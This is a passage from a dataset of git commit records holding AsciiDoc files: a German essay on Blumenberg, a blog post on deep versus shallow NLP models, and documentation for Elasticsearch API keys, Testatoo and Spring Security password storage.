Gef\u00e4hrdung?\n\nMit dem _Dilemma der H\u00f6hle_ f\u00e4ngt alles an. Trotz deren defizit\u00e4ren Angepa\u00dftheit bot die H\u00f6hle Schutz und Obdach auch den Schwachen und Kranken.\n\n> Diese Kinder der H\u00f6hle, die niemals das Recht der St\u00e4rkeren und das der jagenden Ern\u00e4hrer\n> f\u00fcr sich geltend machen konnte, erfanden den Mechanismus der Kompensation.\n>\n> \u2013Hans Blumenberg: *H\u00f6hlenausg\u00e4nge*, Frankfurt a.M., 2. Aufl., 1989, *28*\n\nWeil die H\u00f6hle zur Nahrungssuche zu verlassen, ihnen nicht m\u00f6glich war, ersetzen sie den Bericht v Geschehenen durch die Erz\u00e4hlung von Erdachtem.\nIst die Sprache des J\u00e4gers von den N\u00f6ten der Wirklichkeit, aber vor allem der Selbsterhaltung gepr\u00e4gt, kompensiert der Schwache\nLeistungs- und Erfahrungsdefizit mit der sprachlichen Konstruktion von Wirklichkeiten\nund transformiert derma\u00dfen die Bedingungen, d.h. Bewertungskriterien, zu _Narrationen als\nNarrativen_. Konnte der Bericht zuvor nur _als_ Bericht an seinen eigenen Gelingenskriterien bewertet werden,\nmu\u00df er sich nun als sinnstiftende Erz\u00e4hlform neben anderen beweisen.\n\nAls primitive Kompensation kann die Erz\u00e4hlung \u2013 und sei sie noch\nso gekonnt \u2013 den Bericht nicht ersetzen. Aber die konkrete Kompensation fiktiver und konjunktiver Erz\u00e4hlung bedingt und wird bedingt durch\ndie Kompensationsleistung des Narrativs. 
Dieser mu\u00df auch der Bericht sich zwingend unterordnen.\nDie nun m\u00f6glichen Fragen und Forderungen lassen sich nicht mehr eliminieren und k\u00f6nnten\nnur ignoriert, verschwiegen, verdr\u00e4ngt werden. Allerdings erlaubt das Narrativ eine v\u00f6llig neue\nForm der _actio per distans_ (Blumenberg) und somit eine neue Art, Widerfahrnissen (Kamlah) und Widerst\u00e4nden\n(Cassirer) der Wirklichkeit zu begegnen und diese zu bew\u00e4ltigen.\n\nAus dieser Erz\u00e4hlung \u2013 deren Evidenz nicht von der \u00dcberpr\u00fcfbarkeit ihrer Aussagen an\nder Menschheitsgeschichte abh\u00e4ngt, und damit selbst zum Beispiel f\u00fcr ihren Inhalt wird \u2013\nk\u00f6nnen die Erm\u00f6glichungsbedingungen komplexer Kompensation durch Auslagerung abstrahiert werden:\n\nSchutz durch Best\u00e4ndigkeit der Gemeinschaft, innerhalb derer nicht alle zugleich\nsondern vorerst nur einzelne Mitglieder zu Kompensation sich gen\u00f6tigt f\u00fchlen. Es gilt:\n\n> Wie so oft, beg\u00fcnstigt die Starrheit in einem Teil des Systems seine Elastizit\u00e4t in den anderen Teilen.\n>\n> \u2013 Hans Blumenberg: *\u201eExistenzrisiko und Pr\u00e4vention\u201c*, in: *Beschreibung des Menschen*,\nFrankfurt a.M., 1. Aufl., 2016, 550-622, hier *558*\n\nWeil derart durch andere vor fatalem Scheitern (Tod) gesch\u00fctzt, k\u00f6nnen einzelne\ndas Risiko unspezifischer Kompensationsversuche wagen.\nErst bei Erfolg komplexer Kompensation durch Auslagerung und die dadurch er\u00f6ffneten M\u00f6glichkeiten\nwird die Gemeinschaft insgesamt die kompensatorischen Methoden \u00fcbernehmen.\n\n### post scriptum\n\nEs lohnt die Suche nicht, in Blumenbergs Schriften zu finden, was ich hereingelesen habe.\nMit n\u00e4rrischer Frechheit habe ich seine Ans\u00e4tze gestohlen, auf fremdes Terrain entf\u00fchrt\nund bin mit ihnen umgesprungen, als w\u00e4ren es meine eigenen.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f70837c2c5d9637376f780a9fbf80ae2e01bfc9f","subject":"Update 2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","message":"Update 2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","new_file":"_posts\/2016-09-12-Natural-language-modeling-how-deep-is-too-deep.adoc","new_contents":"= Natural language modeling: how deep is too\u00a0deep?\n:hp-tags: Deep Learning, NLP\n\n[.lead]\nIs Deep Learning always the best tool for Natural Language Understanding tasks? Not necessarily!\n\nRecently, a new paper from Google research appeared on arXiv [1], immediately catching the attention of the NLP community. Focusing \non the problem of Natural Language Inference (NLI), the paper made a convincing case for the overall superiority of ... *shallow* \nsentence representations - as opposed to deep ones - for NLU tasks such as NLI. Furthermore, this paper is but one example in \nthe recent slew of results casting the efficacy of Deep NN architectures into question for text-related tasks. Not the least of which was \nFAIR's FastText[2] (essentially a simple modification of the unsupervised Word2Vec algorithm to deal with supervised learning tasks). \nSee also here[3] and here[4]. \n\nNot familiar with NLI and why it is an important litmus test? Fear not: this paragraph is about to fill you in! \n(For reasers familiar with the terminology, feel free to skip to the next paragraph). 
\nIn a nutshell, Natural Language Inference (also known as Recognizing Textual Entailment) is the task of deciding, for a pair of sentences - a premise and a hypothesis - whether the premise entails the hypothesis, contradicts it, or is neutral with respect to it. For example, the premise \"A soccer game with multiple males playing\" entails the hypothesis \"Some men are playing a sport\". Doing this well requires genuine understanding of both sentences, which is exactly why NLI makes a good litmus test for sentence representations.\n\nHold on, you might say, isn't Deep Learning a new disruptive force in AI, shown beyond doubt to be clearly superior to prior \"shallow\"\nlearning approaches? Well, it depends who you ask. Ask a Computer Vision or a Speech Recognition person, and you'll get an enthusiastic Yes!\nIn (computer) vision, novel DL architectures (such as VGG, GoogleNet, Inception, etc.) have delivered extremely impressive \nresults on ImageNet, CIFAR, even defying expectations of some DL champions in vision [5]. In ASR, commercial heavyweights such as \nGoogle and Baidu have long since switched to DL architectures. It should only be natural to expect, then, to see the \nsame trend in NLP\/NLU, correct? \nWell, not so fast. \n\nThe tide of enthusiasm in Deep Learning has of course spilled over to the NLU community, triggering a massive conversion of both \nacademics and industry practitioners to the newfound DL religion. The stream of impressive results from other fields, \nhelped by the success of the seminal Word2Vec[6] (followed by Glove[7] and the like), was too much to resist. \nRNNs and LSTMs have since become mainstream techniques, offered by \npopular DL libraries such as TensorFlow, Keras, DL4J, etc. Among other big companies, Google has been at the forefront of \nmigrating to DL for text machine learning tasks (such as translation[8], SmartReply[9], etc.)\n\nSo, you ask? Isn't that enough? Well, dear friend: if you are reading this, chances are, you are not Google! And as a result, you \ndon't have the same massive amounts of training data, nor their virtually unlimited computational resources. To the rest of us, \nit is important to understand the performance\/computation tradeoffs that come with DL - which is what this post is really about. \n\nSo let us look at some key problems one by one. \n\n*** Subsection: Text Classification ***\nA common task with plenty of applications: search, intent classification, sentiment analysis, topic modeling \n(slightly different, but close), sequence labeling (related), etc. \nFor text classification, we typically have 3 options: \nA) Logistic Regression or Random Forest with a bag of words or averaged word vectors. \nB) Shallow neural networks such as FastText. \nC) Deep networks such as RNNs\/LSTMs or CNNs. \n\nRecurrent Neural Networks (RNNs) are a category of NN-based models designed specifically for sequences of arbitrary length, \nwhich makes them a particularly attractive tool for modeling text. \nAn RNN consumes a sentence one token at a time, updating a hidden state vector that summarizes everything it has read so far. \nHowever, in practice, RNNs can be hard to train, and for small to medium-sized training datasets, \ngood old classifiers such as Logistic Regression or Random Forest (using a bag of words representation) can often deliver similar or even superior \nperformance at a lower computational cost (see the short sketch below). Even in the Deep Learning category, RNNs have a strong competitor in ConvNets \n(a.k.a. Convolutional Neural Nets or CNNs) - just as long as your text can be treated as fixed length sequences, making them a suitable approach \nto represent and classify tweets, text messages, short user reviews, etc. Still, it's too early to dismiss RNNs and their variants entirely.
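To make option A concrete, here is a minimal sketch of such a shallow baseline (using scikit-learn; the toy dataset is purely illustrative): \n\n[source,python]\n----\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import make_pipeline\n\n# Toy data, just to show the shape of the pipeline.\ntexts = [\"loved this movie\", \"great plot and acting\", \"terrible, a waste of time\", \"awful pacing\"]\nlabels = [1, 1, 0, 0]  # 1 = positive, 0 = negative\n\n# Bag-of-words (TF-IDF) features + Logistic Regression: a strong, cheap baseline.\nclassifier = make_pipeline(TfidfVectorizer(ngram_range=(1, 2)), LogisticRegression())\nclassifier.fit(texts, labels)\nprint(classifier.predict([\"what a great movie\"]))\n----\n\nA pipeline like this trains in seconds on a laptop and gives a reference point that any RNN or CNN must beat to justify its extra cost. 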
Here is an important distinction to realize: many traditional classification methods aim to learn a feature space partitioning function\n(as a means to separate samples of different classes), leaving feature engineering to the application developer. Conversely, neural networks\nactually do more than that: they seek to learn the optimal representation (read: N-dimensional vector encoding of your data points: \npixels, words, sentences, pages, what have you...) so as to minimize the (problem-dependent) loss function on the training set. That learned \nrepresentation is a byproduct that can sometimes be more valuable than the main task. For instance, in Word2Vec, the task is predicting a word \nbased on the words around it (or vice versa), which admittedly is not a very common problem in reality. However, as a byproduct, we get word vectors \nwith very interesting semantic properties (link) that become handy in text classification and other applications. \n\n\n\nSubsection: NLI and machine translation. \nWhy is NLI important? It's a key problem in natural language understanding. Many other NLU problems can be reduced to NLI, such as summarization \n(given a piece of text and a suggested summary, does the former entail the latter), information extraction (does the text entail the extracted fact), \nquestion answering (does the data source entail a given question and answer pair) as well as machine translation \n(does a phrase in language A entail its given translation in language B and vice versa).\nWhy is it mentioned in the same category as machine translation? Both can be cast as an alignment problem. \n\n\nSubsection: Question Answering \n\n\n\nSubsection: Reading comprehension, memory and attention. \n\n\nSubsection: Dialogue and chatbots! \n\n\nSo why has DL been more successful in ASR and vision than NLP\/NLU? That's a topic for another post! \n\n\n\n[1] http:\/\/arxiv.org\/pdf\/1606.01933v1.pdf [A Decomposable Attention Model for Natural Language Inference] \n[2]\n[3]\n[4]\n[5] Karpathy\n[6] Word2Vec\n[7] Glove\n[8] Google Translate\n[9] Smart Reply\n[10] http:\/\/www.foldl.me\/2016\/solving-language\/\n\n \n\n","old_contents":"= Natural language modeling: how deep is too\u00a0deep?\n:hp-tags: Deep Learning, NLP\n\n[.lead]\nIs Deep Learning always the best tool for Natural Language Understanding tasks? 
Not necessarily!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"56b3826e3f052448a91a66b0054bef7aea9831eb","subject":"[DOCS] Add warning about derived API keys to docs (#62351)","message":"[DOCS] Add warning about derived API keys to docs (#62351)\n\n","repos":"robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"x-pack\/docs\/en\/rest-api\/security\/create-api-keys.asciidoc","new_file":"x-pack\/docs\/en\/rest-api\/security\/create-api-keys.asciidoc","new_contents":"[role=\"xpack\"]\n[[security-api-create-api-key]]\n=== Create API key API\n++++\n<titleabbrev>Create API keys<\/titleabbrev>\n++++\n\nCreates an API key for access without requiring basic authentication.\n\n[[security-api-create-api-key-request]]\n==== {api-request-title}\n\n`POST \/_security\/api_key`\n\n`PUT \/_security\/api_key`\n\n[[security-api-create-api-key-prereqs]]\n==== {api-prereq-title}\n\n* To use this API, you must have at least the `manage_api_key` cluster privilege.\n\nIMPORTANT: If the credential that is used to authenticate this request is\nan API key, the derived API key cannot have any privileges. If you specify privileges, the API returns an error.\nSee the note under `role_descriptors`.\n\n[[security-api-create-api-key-desc]]\n==== {api-description-title}\n\nThe API keys are created by the {es} API key service, which is automatically enabled\nwhen you configure TLS on the HTTP interface. See <<tls-http>>. Alternatively,\nyou can explicitly enable the `xpack.security.authc.api_key.enabled` setting. When \nyou are running in production mode, a bootstrap check prevents you from enabling \nthe API key service unless you also enable TLS on the HTTP interface. \n\nA successful create API key API call returns a JSON structure that contains the\nAPI key, its unique id, and its name. If applicable, it also returns expiration\ninformation for the API key in milliseconds. \n\nNOTE: By default, API keys never expire. You can specify expiration information\nwhen you create the API keys. \n\nSee <<api-key-service-settings>> for configuration settings related to API key\nservice.\n\n\n[[security-api-create-api-key-request-body]]\n==== {api-request-body-title}\n\nThe following parameters can be specified in the body of a POST or PUT request:\n\n`name`::\n(Required, string) Specifies the name for this API key.\n\n`role_descriptors`::\n(Optional, array-of-role-descriptor) An array of role descriptors for this API\nkey. This parameter is optional. When it is not specified or is an empty array,\nthen the API key will have a _point in time snapshot of permissions of the \nauthenticated user_. 
If you supply role descriptors then the resultant permissions\nwould be an intersection of API keys permissions and authenticated user's permissions\nthereby limiting the access scope for API keys.\nThe structure of role descriptor is the same as the request for create role API.\nFor more details, see <<security-api-put-role, create or update roles API>>.\n+\n--\nNOTE: Due to the way in which this permission intersection is calculated, it is not\npossible to create an API key that is a child of another API key, unless the derived\nkey is created without any privileges. In this case, you must explicitly specify a\nrole descriptor with no privileges. The derived API key can be used for\nauthentication; it will not have authority to call {es} APIs.\n\n--\n\n`expiration`::\n(Optional, string) Expiration time for the API key. By default, API keys never\nexpire.\n\n\n[[security-api-create-api-key-example]]\n==== {api-examples-title}\n\nThe following example creates an API key:\n\n[source,console]\n------------------------------------------------------------\nPOST \/_security\/api_key\n{\n \"name\": \"my-api-key\",\n \"expiration\": \"1d\", <1>\n \"role_descriptors\": { <2>\n \"role-a\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-a*\"],\n \"privileges\": [\"read\"]\n }\n ]\n },\n \"role-b\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-b*\"],\n \"privileges\": [\"all\"]\n }\n ]\n }\n }\n}\n------------------------------------------------------------\n<1> optional expiration for the API key being generated. If expiration is not\n provided then the API keys do not expire.\n<2> optional role descriptors for this API key, if not provided then permissions\n of authenticated user are applied.\n\nA successful call returns a JSON structure that provides\nAPI key information.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"id\":\"VuaCfGcBCdbkQm-e5aOx\", <1>\n \"name\":\"my-api-key\",\n \"expiration\":1544068612110, <2>\n \"api_key\":\"ui2lp2axTNmsyakw9tvNnw\" <3>\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/VuaCfGcBCdbkQm-e5aOx\/$body.id\/]\n\/\/ TESTRESPONSE[s\/1544068612110\/$body.expiration\/]\n\/\/ TESTRESPONSE[s\/ui2lp2axTNmsyakw9tvNnw\/$body.api_key\/]\n<1> unique id for this API key\n<2> optional expiration in milliseconds for this API key\n<3> generated API key\n\nThe API key returned by this API can then be used by sending a request with an\n`Authorization` header with a value having the prefix `ApiKey` followed\nby the _credentials_, where _credentials_ are the base64 encoding of `id` and `api_key` joined by a colon.\n\nNOTE: If your node has `xpack.security.http.ssl.enabled` set to `true`, then you must specify `https` when creating your API key.\n\n[source,shell]\n--------------------------------------------------\ncurl -H \"Authorization: ApiKey VnVhQ2ZHY0JDZGJrUW0tZTVhT3g6dWkybHAyYXhUTm1zeWFrdzl0dk5udw==\" http:\/\/localhost:9200\/_cluster\/health\n--------------------------------------------------\n\/\/ NOTCONSOLE\n","old_contents":"[role=\"xpack\"]\n[[security-api-create-api-key]]\n=== Create API key API\n++++\n<titleabbrev>Create API keys<\/titleabbrev>\n++++\n\nCreates an API key for access without requiring basic authentication.\n\n[[security-api-create-api-key-request]]\n==== {api-request-title}\n\n`POST \/_security\/api_key`\n\n`PUT \/_security\/api_key`\n\n[[security-api-create-api-key-prereqs]]\n==== {api-prereq-title}\n\n* To use this API, you must have at least 
the `manage_api_key` cluster privilege.\n\n[[security-api-create-api-key-desc]]\n==== {api-description-title}\n\nThe API keys are created by the {es} API key service, which is automatically enabled\nwhen you configure TLS on the HTTP interface. See <<tls-http>>. Alternatively,\nyou can explicitly enable the `xpack.security.authc.api_key.enabled` setting. When \nyou are running in production mode, a bootstrap check prevents you from enabling \nthe API key service unless you also enable TLS on the HTTP interface. \n\nA successful create API key API call returns a JSON structure that contains the\nAPI key, its unique id, and its name. If applicable, it also returns expiration\ninformation for the API key in milliseconds. \n\nNOTE: By default, API keys never expire. You can specify expiration information\nwhen you create the API keys. \n\nSee <<api-key-service-settings>> for configuration settings related to API key\nservice.\n\n\n[[security-api-create-api-key-request-body]]\n==== {api-request-body-title}\n\nThe following parameters can be specified in the body of a POST or PUT request:\n\n`name`::\n(Required, string) Specifies the name for this API key.\n\n`role_descriptors`::\n(Optional, array-of-role-descriptor) An array of role descriptors for this API\nkey. This parameter is optional. When it is not specified or is an empty array,\nthen the API key will have a _point in time snapshot of permissions of the \nauthenticated user_. If you supply role descriptors then the resultant permissions\nwould be an intersection of API keys permissions and authenticated user's permissions\nthereby limiting the access scope for API keys.\nThe structure of role descriptor is the same as the request for create role API.\nFor more details, see <<security-api-put-role, create or update roles API>>.\n\n`expiration`::\n(Optional, string) Expiration time for the API key. By default, API keys never\nexpire.\n\n\n[[security-api-create-api-key-example]]\n==== {api-examples-title}\n\nThe following example creates an API key:\n\n[source,console]\n------------------------------------------------------------\nPOST \/_security\/api_key\n{\n \"name\": \"my-api-key\",\n \"expiration\": \"1d\", <1>\n \"role_descriptors\": { <2>\n \"role-a\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-a*\"],\n \"privileges\": [\"read\"]\n }\n ]\n },\n \"role-b\": {\n \"cluster\": [\"all\"],\n \"index\": [\n {\n \"names\": [\"index-b*\"],\n \"privileges\": [\"all\"]\n }\n ]\n }\n }\n}\n------------------------------------------------------------\n<1> optional expiration for the API key being generated. 
If expiration is not\n provided then the API keys do not expire.\n<2> optional role descriptors for this API key, if not provided then permissions\n of authenticated user are applied.\n\nA successful call returns a JSON structure that provides\nAPI key information.\n\n[source,console-result]\n--------------------------------------------------\n{\n \"id\":\"VuaCfGcBCdbkQm-e5aOx\", <1>\n \"name\":\"my-api-key\",\n \"expiration\":1544068612110, <2>\n \"api_key\":\"ui2lp2axTNmsyakw9tvNnw\" <3>\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/VuaCfGcBCdbkQm-e5aOx\/$body.id\/]\n\/\/ TESTRESPONSE[s\/1544068612110\/$body.expiration\/]\n\/\/ TESTRESPONSE[s\/ui2lp2axTNmsyakw9tvNnw\/$body.api_key\/]\n<1> unique id for this API key\n<2> optional expiration in milliseconds for this API key\n<3> generated API key\n\nThe API key returned by this API can then be used by sending a request with an\n`Authorization` header with a value having the prefix `ApiKey` followed\nby the _credentials_, where _credentials_ are the base64 encoding of `id` and `api_key` joined by a colon.\n\nNOTE: If your node has `xpack.security.http.ssl.enabled` set to `true`, then you must specify `https` when creating your API key.\n\n[source,shell]\n--------------------------------------------------\ncurl -H \"Authorization: ApiKey VnVhQ2ZHY0JDZGJrUW0tZTVhT3g6dWkybHAyYXhUTm1zeWFrdzl0dk5udw==\" http:\/\/localhost:9200\/_cluster\/health\n--------------------------------------------------\n\/\/ NOTCONSOLE\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc3fc6a44ac689f267b5f15e6cbd68874b46f3ac","subject":"Add documentation","message":"Add documentation\n","repos":"Ovea\/testatoo,Ovea\/testatoo","old_file":"testatoo-documentation\/doc\/testatoo.adoc","new_file":"testatoo-documentation\/doc\/testatoo.adoc","new_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:source-highlighter: highlightjs\n:imagesdir: images\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n\nimage:logo.png[float=\"left\"]\n\n= Introduction\n\nTestatoo is a web user interface testing tool. It's the result of numerous real-world observations of developers in the trenches in the area of GUI testing.\nWorking for many years to promote the TDD approaches, we often faced difficulties in their implementation for the graphical layer of applications.\n\nThe \"test FIRST\" principle excludes all scenario recorder based approaches that only allow you to write a posteriori tests.\nOur experience has taught us that this path is a dead end (but we reserve this for another discussion...).\n\nAnother problem is GUI tests are brittle and costly! 
We do think that this is due to the lack of abstraction in existing UI testing tools.\n\nTestatoo provides on one hand an abstraction of the UI business domain through an expressive API, and on the other hand a way to express this domain via a DSL (a button semantically stays a button whatever the technology).\nWith Testatoo you can therefore write tests with a seldom achieved level of expressiveness and make these tests INDEPENDENT of the underlying technology.\n\nTestatoo can therefore transform tests into real assets, present throughout the life of the application and always in tune with the latest version of the application.\n\n= Technologies\n\nTestatoo is built on top of http:\/\/code.google.com\/p\/selenium\/[WebDriver]; it can work with http:\/\/code.google.com\/p\/selenium\/wiki\/FrequentlyAskedQuestions#Q:_Which_browsers_does_WebDriver_support?[any browser supported by WebDriver] (IE, Google-chrome, Firefox, ...).\nLike http:\/\/www.gebish.org\/testing[geb], Testatoo provides an extra layer of convenience and productivity, but it is always possible to \"fall back\" to the WebDriver level to do something directly should you need to.\nTestatoo adds a powerful DSL while maintaining the usage of pure Java and keeps the advantage of a strongly typed language.\n\nExample of the test syntax:\n\n[source, java]\n.Listing 1.0: a sample syntax\n-------------------------------------------------------------------------------\n assertThat textField has label('Text')\n assertThat textField has placeholder('Text')\n assertThat textField is empty\n-------------------------------------------------------------------------------","old_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:source-highlighter: highlightjs\n:imagesdir: images\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n\n[preface]\n= TODO\n\nimage:logo.png[float=\"left\"]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bb99d7d95ac2d31874b93e84bb584c3f0cf52cb6","subject":"Fix return type for NoOpPasswordEncoder bean in documentation","message":"Fix return type for NoOpPasswordEncoder bean in documentation\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/features\/authentication\/password-storage.adoc","new_file":"docs\/modules\/ROOT\/pages\/features\/authentication\/password-storage.adoc","new_contents":"[[authentication-password-storage]]\n= Password Storage\n\nSpring Security's `PasswordEncoder` interface is used to perform a one way transformation of a password to allow the password to be stored securely.\nGiven `PasswordEncoder` is a one way transformation, it is not intended when the password transformation needs to be two way (i.e. storing credentials used to authenticate to a database).\nTypically `PasswordEncoder` is used for storing a password that needs to be compared to a user provided password at the time of authentication.\n\n
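For example, encoding happens once when the credential is first stored, and `matches` is used for the comparison at authentication time. A minimal sketch (`BCryptPasswordEncoder` is just one possible implementation):\n\n====\n.Java\n[source,java,role=\"primary\"]\n----\nPasswordEncoder encoder = new BCryptPasswordEncoder();\n\n\/\/ one way transformation, performed when the password is first stored\nString stored = encoder.encode(\"rawPassword\");\n\n\/\/ later, at authentication time, compare the user provided password to the stored value\nboolean matches = encoder.matches(\"rawPassword\", stored);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval encoder: PasswordEncoder = BCryptPasswordEncoder()\n\n\/\/ one way transformation, performed when the password is first stored\nval stored = encoder.encode(\"rawPassword\")\n\n\/\/ later, at authentication time, compare the user provided password to the stored value\nval matches = encoder.matches(\"rawPassword\", stored)\n----\n====\n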
storing credentials used to authenticate to a database).\nTypically `PasswordEncoder` is used for storing a password that needs to be compared to a user-provided password at the time of authentication.\n\n[[authentication-password-storage-history]]\n== Password Storage History\n\nThroughout the years the standard mechanism for storing passwords has evolved.\nIn the beginning, passwords were stored in plain text.\nThe passwords were assumed to be safe because the data store they were saved in required credentials to access it.\nHowever, malicious users were able to find ways to get large \"data dumps\" of usernames and passwords using attacks like SQL Injection.\nAs more and more user credentials became public, security experts realized we needed to do more to protect users' passwords.\n\nDevelopers were then encouraged to store passwords after running them through a one way hash such as SHA-256.\nWhen a user tried to authenticate, the hashed password would be compared to the hash of the password that they typed.\nThis meant that the system only needed to store the one way hash of the password.\nIf a breach occurred, then only the one way hashes of the passwords were exposed.\nSince the hashes were one way and it was computationally difficult to guess the passwords given the hash, it would not be worth the effort to figure out each password in the system.\nTo defeat this new system, malicious users decided to create lookup tables known as https:\/\/en.wikipedia.org\/wiki\/Rainbow_table[Rainbow Tables].\nRather than doing the work of guessing each password every time, they computed each password once and stored it in a lookup table.\n\nTo mitigate the effectiveness of Rainbow Tables, developers were encouraged to use salted passwords.\nInstead of using just the password as input to the hash function, random bytes (known as salt) would be generated for every user's password.\nThe salt and the user's password would be run through the hash function, which produced a unique hash.\nThe salt would be stored alongside the user's password in clear text.\nThen, when a user tried to authenticate, the hashed password would be compared to the hash of the stored salt and the password that they typed.\nThe unique salt meant that Rainbow Tables were no longer effective because the hash was different for every salt and password combination.\n\nIn modern times we realize that cryptographic hashes (like SHA-256) are no longer secure.\nThe reason is that with modern hardware we can perform billions of hash calculations a second.\nThis means that we can crack each password individually with ease.\n\nDevelopers are now encouraged to leverage adaptive one-way functions to store a password.\nValidation of passwords with adaptive one-way functions is intentionally resource (i.e. 
CPU, memory, etc) intensive.\nAn adaptive one-way function allows configuring a \"work factor\" which can grow as hardware gets better.\nIt is recommended that the \"work factor\" be tuned to take about 1 second to verify a password on your system.\nThis trade-off makes it difficult for attackers to crack the password, but not so costly that it puts an excessive burden on your own system.\nSpring Security has attempted to provide a good starting point for the \"work factor\", but users are encouraged to customize the \"work factor\" for their own system since the performance will vary drastically from system to system.\nExamples of adaptive one-way functions that should be used include <<authentication-password-storage-bcrypt,bcrypt>>, <<authentication-password-storage-pbkdf2,PBKDF2>>, <<authentication-password-storage-scrypt,scrypt>>, and <<authentication-password-storage-argon2,argon2>>.\n\nBecause adaptive one-way functions are intentionally resource intensive, validating a username and password for every request will degrade the performance of an application significantly.\nThere is nothing Spring Security (or any other library) can do to speed up the validation of the password since security is gained by making the validation resource intensive.\nUsers are encouraged to exchange the long-term credentials (i.e. username and password) for a short-term credential (i.e. session, OAuth Token, etc).\nThe short-term credential can be validated quickly without any loss in security.\n\n\n[[authentication-password-storage-dpe]]\n== DelegatingPasswordEncoder\n\nPrior to Spring Security 5.0 the default `PasswordEncoder` was `NoOpPasswordEncoder`, which required plain text passwords.\nBased upon the <<authentication-password-storage-history,Password History>> section you might expect that the default `PasswordEncoder` is now something like `BCryptPasswordEncoder`.\nHowever, this ignores three real-world problems:\n\n- There are many applications using old password encodings that cannot easily migrate\n- The best practice for password storage will change again\n- As a framework Spring Security cannot make breaking changes frequently\n\nInstead Spring Security introduces `DelegatingPasswordEncoder`, which solves all of the problems by:\n\n- Ensuring that passwords are encoded using the current password storage recommendations\n- Allowing for validating passwords in modern and legacy formats\n- Allowing for upgrading the encoding in the future\n\nYou can easily construct an instance of `DelegatingPasswordEncoder` using `PasswordEncoderFactories`.\n\n.Create Default DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nPasswordEncoder passwordEncoder =\n PasswordEncoderFactories.createDelegatingPasswordEncoder();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval passwordEncoder: PasswordEncoder = PasswordEncoderFactories.createDelegatingPasswordEncoder()\n----\n====\n\nAlternatively, you may create your own custom instance. 
For example:\n\n.Create Custom DelegatingPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString idForEncode = \"bcrypt\";\nMap<String, PasswordEncoder> encoders = new HashMap<>();\nencoders.put(idForEncode, new BCryptPasswordEncoder());\nencoders.put(\"noop\", NoOpPasswordEncoder.getInstance());\nencoders.put(\"pbkdf2\", new Pbkdf2PasswordEncoder());\nencoders.put(\"scrypt\", new SCryptPasswordEncoder());\nencoders.put(\"sha256\", new StandardPasswordEncoder());\n\nPasswordEncoder passwordEncoder =\n new DelegatingPasswordEncoder(idForEncode, encoders);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval idForEncode = \"bcrypt\"\nval encoders: MutableMap<String, PasswordEncoder> = mutableMapOf()\nencoders[idForEncode] = BCryptPasswordEncoder()\nencoders[\"noop\"] = NoOpPasswordEncoder.getInstance()\nencoders[\"pbkdf2\"] = Pbkdf2PasswordEncoder()\nencoders[\"scrypt\"] = SCryptPasswordEncoder()\nencoders[\"sha256\"] = StandardPasswordEncoder()\n\nval passwordEncoder: PasswordEncoder = DelegatingPasswordEncoder(idForEncode, encoders)\n----\n====\n\n[[authentication-password-storage-dpe-format]]\n=== Password Storage Format\n\nThe general format for a password is:\n\n.DelegatingPasswordEncoder Storage Format\n====\n[source,text,attrs=\"-attributes\"]\n----\n{id}encodedPassword\n----\n====\n\nHere, `id` is an identifier used to look up which `PasswordEncoder` should be used and `encodedPassword` is the original encoded password for the selected `PasswordEncoder`.\nThe `id` must be at the beginning of the password, start with `{` and end with `}`.\nIf the `id` cannot be found, the `id` will be null.\nFor example, the following might be a list of passwords encoded using different `id` values.\nAll of the original passwords are \"password\".\n\n.DelegatingPasswordEncoder Encoded Passwords Example\n====\n[source,text,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG \/\/ <1>\n{noop}password \/\/ <2>\n{pbkdf2}5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc \/\/ 